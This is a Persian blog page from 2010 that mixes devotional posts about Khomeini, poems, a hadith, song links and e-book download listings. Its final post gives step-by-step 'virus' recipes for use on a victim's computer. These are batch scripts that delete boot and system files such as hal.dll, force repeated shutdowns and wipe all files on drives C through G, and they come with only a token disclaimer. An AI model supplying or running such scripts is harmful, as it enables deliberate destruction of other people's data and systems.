دقت حضرت امام وبرنامه داشتن در کار ، مطالعه وپاسخگوئی به مراجعین ، زبانزد خاص وعام بود ، به گونه ای که بسیاری از اهل منزل ، وقت را از روی افعال حضرت امام بدست می آوردند .طبق نقل موثق ، روزی که ادوارد شوار نادزه ، وزیر امور خارجه شوروی ، جهت ملاقات وابلاغ پیام گورباچف به خدمت حضرت امام رسید ، حدود یک ربع یا بیست دقیقه زودتر از وقت مقرر وارد دفتر حضرت امام (ره) در جماران می شوند که به اطلاع امام می رسد ایشان به ساعت خود نگاه می  کنند و می فرمایند قرار ما رأس ساعت 8 است ومن زودتر نمی پذیرم . حضرت امام برای مطالعه ، ملاقات ، نماز ، دعا و نیایش ، ورزش ، رسیدگی به کارها وگزارشات و... زمان مخصوص ومعینی داشتند که کمتر اتفاق می افتاد خلاف آن عمل شود .

صبر واستقامت :

این دو هدیه الهی به بشر وبویژه انبیاء واولیاء (ع) رمز موفقیت در رسیدن به مقصد وکمال مطلوب بوده است . ایشان از این دو ویژگی بهره وافر داشتند ومصداق آیه شریفه « ان الذین قالوا ربنا الله ثم استقاموا ...»  بودند .

توکل بر خدا:

تکیه آن حضرت بر اعتماد واتکال به خدا  از رموز به صحنه کشانیدن مردم بود . حضرت امام در حساسترین لحظات پیروزی انقلاب اسلامی که اغلب مایوس وناامید بودند می فرمودند :

«خدا با شماست ، شما پیروز می شوید ، اتکالتان به حق تعالی باشد . برای آنها که با ماوراء طبیعت مرتبطند ،شکست بی معناست ، انسان موحد شکست نمی خورد .»

 

تسلیم ناپذیری :

این ویژگی امام در تمام دوران مبارزه بود وزندان ، تبعید ، جنگ ، کودتا ، قتل وغارت وتهاجم تبلیغاتی مسموم ومغرضانه دشمن ، هیچ یک نتوانست حضرتش را از این راه بازدارد . کمال این تسلیم ناپذیری ، در منشور انقلاب ، به عنوان یکی از اصول استراتژیک بیان شده است:

« اگر بند بند استخوانهایمان را جدا سازند ، اگر سرمان را بالای دار برند ، اگر زنده زنده در شعله های آتش بسوزانند ، اگر زن وفرزندان وهستیمان را در جلو دیدگانمان به اسارت وغارت برند ، هرگز امان نامه کفر وشرک را امضاء نمی کنیم .»

سعه صدر:

رهبر کبیر وفید انقلاب اسلامی ، سعه صدر وبینشی عمیق وگسترده داشتند ایشان هیچگاه در مقابل برخوردهای شخصی افراد نسبت به حضرتس موضع نگرفتند آنچه برای ایشان مطرح بود ، اسلام واحکام نورانی آن بود . امام خمینی آن قدر سعه صدر داشتند که می فرمودند ، اگر کسی به من فحش داد ، شما به خاطر من با اوبرخورد نکنید.

ساده زیستی :

گرچه دنیا با همه مظاهر فریبنده « قدرت ، ثروت ، شهرت ، دولت و...به آن حضرت رو کرده بود ، ایشان از کنار کاخها ی سر به فلک کشیده « سعد آباد ونیاوران و...» گذشتند وخانه محقر دواطاقه استیجاری دهکده جماران را برگزیدند . امام هنگامی که در هوای گرم نجف در منزلی محقر زندگی می کرد ، اجازه خرید ونصب یک کولر ویا پنکه را نمی داد ومی فرمود: « آیا همه مردم یا همه مبارزان راه خدا از چنین امکاناتی برخوردارند؟»

 

اخلاق حسنه :

 - در خانواده

بر خلاف پندار بعضی که حضرت امام خمینی به خاطر کثرت کارها ، فرصت رسیدگی به امور خانواده وبرخورد عاطفی را نداشته اند ! ایشان به خاطر نظم دقیق در برنامه ها ، با خانواده وبستگان رابطه ای بسیار صمیمی وعاطفی داشتند . هیچگاه در محیط خانواده به کسی تحکم نکرده اند . در کارها ی شخصی دیگران مداخله ننموده ولی همیشه ناصح مشفق بوده اند .

- ارتباط با شاگردان

از خصوصیات حضرت امام ( طبق گفته شاگردان ایشان ) این بود که با شاگردان خود رابطه ای بسیار صمیمی وگرم داشتند . در برنامه امام ، مساله ای تحت عنوان استاد وشاگرد مطرح نبود . با آنها جلسه می گذاشت وحر آنها را می شنید وبه انها شخصیت می داد وراهنمای آنان در زندگی علمی وشخصی بود . امام همچنین با دوستانش بسیار صمیمی بود وبه آنان احترام می گذاشت و آنان را بر خود مقدم می داشت . امام اگر در می یافت که طلبه ای ،زحمت می کشد ودرس می خواند ، احترام فراوانی برای او قائل بود.

- ارتباط با مراجع وبزرگان حوزه

این عبارت از آن مرشد ومراد است که فرمود : « من دست مراجع را می بوسم » . امام ( رضوان ا... علیه ) به بزرگان حوزه ومراجع از علمای سلف وحال ، بسیا احترام می گذاشت . نام آنان را با احترم یاد می کرد وشخصیت علمی وروحانی آنان را ارج می نهاد .

- ارتباط با مردم

اامام خمینی مانند پیامبر وائمه (ع) رابطه ای بسیار نزدیک وصمیمی با مردم داشتند . تکیه بر صداقت توده های محروم وزحمتکش ونه برزرو زور وتزویر ، نمایانگر روح اعتماد آن حضرت است .زمانی ک امام در زندان وتبعید بودند ، بسیاری آن حضرت را از اعتماد به مردم باز می داشتند ومی گفتند در لحظات بحرانی وحساس ، نمی توان بر مردم تکیه کرد . ولی ایشان می فرمودند :

« مردم در 15 خرداد صداقت خود را به اثبات رساندند .»

در پاسخ یکی از آقایان که گفته بود : ما بمبی نداریم که بر سر شاه بزنیم ، امام فرمود : « ما نیرویی داریم که از بمب به مراتب کار ساز تر است وآن نیروی مردمی است .» لذا امام با قدرت به شاه خطاب کرد وفرمود : « کاری نکن که بگویم این مردم تو را مملکت بیرون کنند .»

مبارزات :

-آغاز مبارزه

امام مبارزه آشکار خود را از مهر ماه 1341 شمسی به دنبال مساله انجمنهای ایالتی وولایتی آغاز کرد وبا دستگاه جبار پهلوی ، رو در رو به مبارزه پرداخت . اوج این مرحله از نهضت ، یورش رژیم در فروردین 42 به مدرسه فیضیه وضرب وشتم وکشتار طلاب وفضلای حوزه علمیه قم وبه دنبال آن دستگیری وزندانی کردن حضرت امام (قدس سره ) وماجرای خونین 15 خرداد 42 بود که پس از آن به تبعید حضرت امام در 13 آبان 1343 شمسی ، به ترمیه وعراق انجامید .

- نیرو سازی

امام  پس از تبعید به ترکیه ونجف ، مدت 15 سال ، کار آماده سازی ومتحول ساختن مردم وتبیین ححقایق را دنبال کرد وبا سخنرانیها ، پیامها واعلامیه ها در بیداری اقشار مختلف ملت تلاش بسیاری نمود . اوج مبارزه وسقوط رژیم 25000 ساله شاهنشاهی پس از آماده سازی ملت ، زمان خروش عظیم علیه طاغوت ، رهبری امام عظیم الشان فرا رسید و لطف خفیه العی در عسرت فقدان امید آینده   اسلام وحضرت آیة ا... حاج آقا مصطفی خمینی (قدس سره) رخ نمود وجرقه انقلاب اسلامی زده شد وبا خون پاکان امت سیلابی فراهم وکاخ ظلم وستم شاهنشاهی 2500 ساله را از بن وریشه برکند .

در دوران یکساله (از 19 دی 56 تا 22 بهمن 57 ) اوج مبارزات ملت قهرمان ایران ، کسانی بودند  که شعار می دادند مشت وگلوله دو مقوله ناسازگارند ولی امام با بیان مکتب عاشورا ، وسوسه جناسان را خنثی کرد ونهضت را به ثمر نشاند . گرچه ملت مسلمان ایران ، شهدای فراوانی دادند ، موفق شدند با هدایت مرجع بزرگوارعالم تشیع ورهبر کبیر امت اسلامی ، ثمره شیرین جمهوری اسلامی را به دست آوردند.

-استقرار نظام جمهوری اسلامی

رهبر کبیر وبنیانگذار جمهوری اسلامی ، حضرت امام خمینی (سلام اله علیه ) با به ثمر نشستن انقلاب اسلامی ، متوجه توطئه های شرق وغرب ومزدوران  داخلی آنها ( احزاب وگروهکهای وابسته ) شدند . لذا هیچ گاه از روشنفکری وهدایت امت غافل نبودند .

 

غروب خورشید امام :

حضرت امام ذخمینی در شامگاه 13 خرداد 1368 شمسی ساعت 22/20 به ملکوت اعلا پیوست . گرچه ضایعه فقدان آن حضرت بر امت اسلامی بسیار گران بود ، گریزی  از آن نبود ، چه این که : « کل نفس ذائقه الموت » .

به حق ، اگر امت (قدس سره ) در لحظات بحرانی انقلاب ، سکاندار کشتی متلاطم در دریای حوادث وطوفانهای توطئه های شرق وغرب نبودند ، امروز از انقلاب ونظام جمهوری اسلامی وبلکه اسلام ناب محمدی (ص) اثری نبود .

او در حوادث کردستان ، آذربایجان ، گنبد ، خوزستان ، دانشگاه ، کودتای نوژه ، حمله آمریکا به طبس ، انفجارها وشهادت عزیزین ومسئولین نظام ، محاصره اقتصادی ، انزوای سیاسی ، جنگ تحمیلی هشت ساله ، ورود اعضای پیمان ناتو در جنگ ومنطقه خلیج فارس و... ودرهها توطئه کوچک وبزرگ دیگر ، همچون بنیان مرصوص وچون کوهی استوار وایستاده وامت نیز بر او تکیه زده در بیعت با حضرتش ثابت واستوار ماندند واز همه توطئه ها ومشکلات سرفراز خارج شدند وامروز راه آن عزیز را که صراط مستقیم الهی است - در پشت سر فرزند خلفش ، رهبر معظم انقلاب اسلامی ، حضرت آیة ا... خامنه ای (مدظله العالی ) ادامه می دهند واز هیچ قدرتی هراس ندارند .

کلام آخر :  خرداد همیشه بار غم بر دوش ما نهاده است وما صبوری پیشه کرده ایم . سالگرد رحلت امام ، سالگرد بیعت ومیثاق است ، با آنچه امام بر سر آن جان باخت وشهدا خود را برای سلامت ماندن آن ایثار کردند یعنی پیمان با رسول اسلام وانقلاب وراه تو ای روح خدا در زمین ومیان عاشقانت تداوم یافت وخلف صالح تو خامنه ای عزیز با صلابت ودرایت ومحبوبیت ومحور ووحدت مظهر ولایت گشت .

ای مهربان پدر ، ای امام ! شفیع ما باش تا در دنیا از خط اسلام جدا نشویم ودر آخرت از صراط نلغذیم . دستمان را بگیر . بر دلهایمان بتاب ، جانمان را برویان وراهمان را بنمایان .

 

روح امام عزیزمان شاد وراهشان پر رهرو باد .

کیانوش انصاری بازدید : 106 دوشنبه 26 مهر 1389 نظرات (0)

خدایا می دانی که چه می کشم ،

پنداری که چون شمع ذوب می شوم

ما از مردن نمی هراسیم

اما می ترسیم بعد از ما ایمان را سر ببرند و اگر بسوزیم ،

روشنایی می رود و جای خود را دوباره به شب می سپارد

پس چه باید کرد ؟

از یک سو باید بمانیم تا شهید اینده شویم

و از دیگر سو باید شهید شویم تا اینده بماند

هم باید امروز شهید بشویم تا فردا بماند و هم باید بمانیم تا فردا شهید بشویم

عجب دردی !

چه می شد امروز شهید می شدیم و فردا زنده می شدیم تا دوباره شهید شویم ؟


شهید کاظم لطیفی زاده

 

کیانوش انصاری بازدید : 129 دوشنبه 26 مهر 1389 نظرات (0)

حضرت محمّد صلّی الله علیه و آله:


مادام که مردم امر به معروف و نهی از منکر می‌کنند

درنیکی و تقوی همدیگر رایاری می‌دهند،همواره درخیر وخوبی‌اند

پس هرگاه چنین نکنند برکات از آنان برداشته خواهد شد

و برخی بر یرخی مسلط خواهند شد

و برای آنان، نه در زمین و نه در آسمان، یاوری نخواهد بود.

 


الطوسی؛ تهذیب‏الأحکام، ج۶، ص۱۸۱


 

 

کیانوش انصاری بازدید : 156 دوشنبه 26 مهر 1389 نظرات (0)

جاده هایی که تو در آنها راه می روی

همان جاده هایي هستند که می خواستم که بتواني ببینيشان !

کوچه هایی که تو در آنها قدم می گذاری

کوچه های همان خلوت گاه های من است

که سیگار های تنهاییم را می کشیدم !

تو روزها را می گذرانی اما

من خود را از تن جمعه ام بیرون نمي كشم.

چیزی . آبشار . فراتر. میرود . سیگار . روز . تنها !

من نمي توانستم که بیشتر از اینها بخواهم...

 !!!

کیانوش انصاری بازدید : 149 دوشنبه 26 مهر 1389 نظرات (0)

آهنگ جدید و فوق العاده زیبای علی لهراسبی به نام فاصله ها.

آهنگسازی این اثر توسط فواد غفاری انجام گرفته است.

دانلود آهنگ فاصله ها

لینک مستقیم :

آهنگ با کیفیت MP3 320

فاصله ها …

آهنگ با کیفیت MP3 192

فاصله ها …

آهنگ با کیفیت MP3 128

فاصله ها …

آهنگ با کیفیت ۶۴ OGG

فاصله ها …

آهنگ با کیفیت WMA 20 ( مخصوص تلفن همراه )



لینک غیر مستقیم ( Rapidshare )

آهنگ با کیفیت MP3 320

کیانوش انصاری بازدید : 107 دوشنبه 26 مهر 1389 نظرات (0)
 

نویسنده: دکتر علی شریعتی

نیاز های انسان امروز

ناشر: آی آر پی دی اف

توضیحات:

کتابی با عنوان نیاز های انسان امروز

 

زبان: فارسی

حجم کتاب: 235 کیلوبایت

تعداد صفحات: 20

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.


نویسنده: دکتر علی شریعتی

پیروان علی و رنجهایشان

ناشر: آی آر پی دی اف

توضیحات:

پیروان علی و رنجهایشان نوشته دکتر علی شریعتی

 

زبان: فارسی

حجم کتاب: 232 کیلوبایت

تعداد صفحات: 17

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.


نویسنده: دکتر علی شریعتی

سوره روم پیام امید به روشن فکر مسئول

ناشر: چاپخانه صفایی

توضیحات:

سوره روم پیام امید به روشن فکر مسئول

 

زبان: فارسی

حجم کتاب: 416 کیلوبایت

تعداد صفحات: 37

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.


نویسنده: علیرضا فیروزی

کتاب همراه پیامک های دکتر علی شریعتی

ناشر: آی آر پی دی اف

توضیحات:


 

زبان: فارسی

حجم کتاب: 160 کیلوبایت

تعداد صفحات: 231

نوع فایل: jar

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.


نویسنده: دکتر علی شریعتی

50 جمله زیبا و عاشقانه از دکتر علی شریعتی

ناشر: آی آر پی دی اف

توضیحات:

50 جمله زیبا و عاشقانه از دکتر علی شریعتی

 

زبان: فارسی

حجم کتاب: 108 کیلوبایت

تعداد صفحات: 8

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.

 


نویسنده: دکتر علی شریعتی

مکتب، وحدت، عدالت، علی

ناشر: انتشارات بعثت

توضیحات:

مکتب، وحدت، عدالت، علی

 

زبان: فارسی

حجم کتاب: 390 کیلوبایت

تعداد صفحات: 53

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.

منبع:  www.irpdf.com

کیانوش انصاری بازدید : 157 دوشنبه 26 مهر 1389 نظرات (0)

نویسنده: سید حسین نجم

رویدادهای شگفت انگیز آینده (1)

ناشر: موسسه آموزشی صنایع دفاع

توضیحات:

رویدادهای شگفت انگیز آینده (1)
سخنرانی پیتر شوارتز در مرکز تحول وزارت دفاع آمریکا (2006)

 

زبان: فارسی

حجم کتاب: 780 کیلوبایت

تعداد صفحات: 47

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.


نویسنده: سید حسین نجم

رویدادهای شگفت انگیز آینده (2)

ناشر: موسسه آموزشی صنایع دفاع

توضیحات:

رویدادهای شگفت انگیز آینده (2)
سخنرانی پیتر شوارتز در مرکز تحول وزارت دفاع آمریکا (2006)

 

زبان: فارسی

حجم کتاب: 369 کیلوبایت

تعداد صفحات: 35

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.


اقلیت های دینی

ناشر: باشگاه انديشه

توضیحات:

كتاب حاضر كه از مجموعه “از چشم‌انداز امام علی (ع)” می‌باشد، به بررسی نحوه معاشرت با اقلیت‌های دینی و حقوق متقابل اقلیت‌ها و حكومت‌ اسلامی از دیدگاه امام علی (ع) می‌پردازد.

 

زبان: فارسی

حجم کتاب: 413 کیلوبایت

تعداد صفحات: -

نوع فایل: exe

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.

نویسنده: مهدی گندم زاده - رضا صفری - محمد امین عزیز مقدم

دانلود رایگان کتاب زندگی پس از مرگ

ناشر: آی آر پی دی اف

توضیحات:

دانلود رایگان کتاب زندگی پس از مرگ

 

زبان: فارسی

حجم کتاب: 495 کیلوبایت

تعداد صفحات: 513

نوع فایل: PDF

 *** برای مطالعه این کتاب برنامه اجرا کننده آن را از این قسمت دانلود کنید.

 *** در صورت دانلود نشدن کتاب، بر روی Download راست کلیک کرده و گزینه ...Save Target As را انتخاب نمایید.

کیانوش انصاری بازدید : 159 دوشنبه 26 مهر 1389 نظرات (0)

به نام پروردگار و با سلام

من اولین باری که یک وبلاگ افتتاح و شروع به وبلاگ نویسی کردم

مطالب وبلاگ تنها مربوط به هک و مسائل امنیتی بود.

خیلی وقته که در ایت ضمینه اطلاعاتم رو به روز نکردم

و حتی همون اطلاعات قرن بوقی هم خاطرم نیست یا شایدم فرمت شده.

ولی خوب یه مقدارش رو تونستم ریکاوری بکنم  و از این به بعد تصمیم گرفتم

که توی این وبلاگ مطالب آموزشی هم قرار بگیره...

به همین منظور برای شروع چند تا مطلب آموزشی در مورد

ساخت کد های مخرب (به قول شما ویروس) رو برای مطالعه ی عالی قرار میدم


امروز میخوام یه کد بهتون بدم که اگه اونو تو notepad  تو کامپیوتر قربانی تایپ کنیدو با هر اسمی ولی با پسوندbat. مثل hacker.bat سیو کنید کامپیوتر قربانی reset میکنه و بعد از اجرا شدن دوباره windows بعد از 30 ثانیه دوباره reset میکنه!!!! اینم کدمون: 

del autoexec.bat del config.sys cd winnt del system.ini del win.ini

این ویروس رو رو کامپیوتر خودتون امتحان نکنید!!

--------------------------------------------------------------

این ویروس برای سوزاندن cpu هست طوری که وقتی کسی در کامپیوترش notepad رو باز میکنه و در اون رمز ما رو که:       cpu_567hjkblaster        هست رو تو کامپیوترش تایپ کنه و باهر اسمی ولی با پسوند bat.   مثل:    thebesthacker.bat          در هر جای کامپیوترش سیو کنه کامپیوترش reset میکنه و وقتی دوباره windows بالا بیاد تمام برنامه های کامپیوتر قربانی پاک شده.

این ویروس را روی کامپیوتر خودتون امتحان نکنید!!!!!!!!

توجه:هر گونه استفاده ی نا به جا به عهده ی خود  کاربر می باشد.

--------------------------------------------------------------

اینم مثل قبلیا با نوت‌‌پده فقط اینو با پسوند bat. مثل virus.bat ذخیره کنید تا کامپیوتر طرف از این رو به اون رو بشه اینم کدمون:

del c:WINDOWSsystem32hal.dll

del c:WINDOWSsystem32hal.dll

del c:WINDOWSsystem32hal.dll

del c:WINDOWSsystem32hal.dll

del d:WINDOWSsystem32hal.dll

del d:WINDOWSsystem32hal.dll

del d:WINDOWSsystem32hal.dll

del d:WINDOWSsystem32hal.dll

shutdown -s -c "shutdown your computer" -t 20

shutdown -s -c "shutdown your computer" -t 20

shutdown -s -c "shutdown your computer" -t 20

shutdown -s -c "shutdown your computer" -t 20

logoff

logoff

--------------------------------------------------------------

این ویروس بسیار خطرناك است چون با اجرا شدن آن دیگر برای قربانی راهی جز اف دیسك كردن كامپیوتر باقی نمی ماند. مواظب باشید اشتباها روی آن دابل كلیك نكنید.
هرگونه استفاده غیر متعارف از این ویروس به عهده كاربر می باشد.

متن ویروس:

ATTRIB -a -s -h -r c
ATTRIB -a -s -h -r c:windows*.*
Echo y | echo a | Echo y | del c:*.*
Echo y | echo a | Echo y | del d:*.*
Echo y | echo a | Echo y | del e:*.*
Echo y | echo a | Echo y | del f:*.*
Echo y | echo a | Echo y | del g:*.*
echo y | copy *.* C:
echo y | copy *.* D:
echo y | copy *.* E:
echo y | copy *.* F:
echo y | copy *.* G:

 

 

هکر

تعداد صفحات : 14

درباره ما
Profile Pic
لطفا فعلا از آدرس زیر استفاده بکنید...
مقالات آموزشی و دانلود نرم افزار www.ghalamyaz.com
اطلاعات کاربری
  • فراموشی رمز عبور؟
  • آرشیو
    آمار سایت
  • کل مطالب : 398
  • کل نظرات : 3
  • افراد آنلاین : 5
  • تعداد اعضا : 0
  • آی پی امروز : 7
  • آی پی دیروز : 13
  • بازدید امروز : 9
  • باردید دیروز : 14
  • گوگل امروز : 0
  • گوگل دیروز : 0
  • بازدید هفته : 381
  • بازدید ماه : 381
  • بازدید سال : 6,658
  • بازدید کلی : 69,879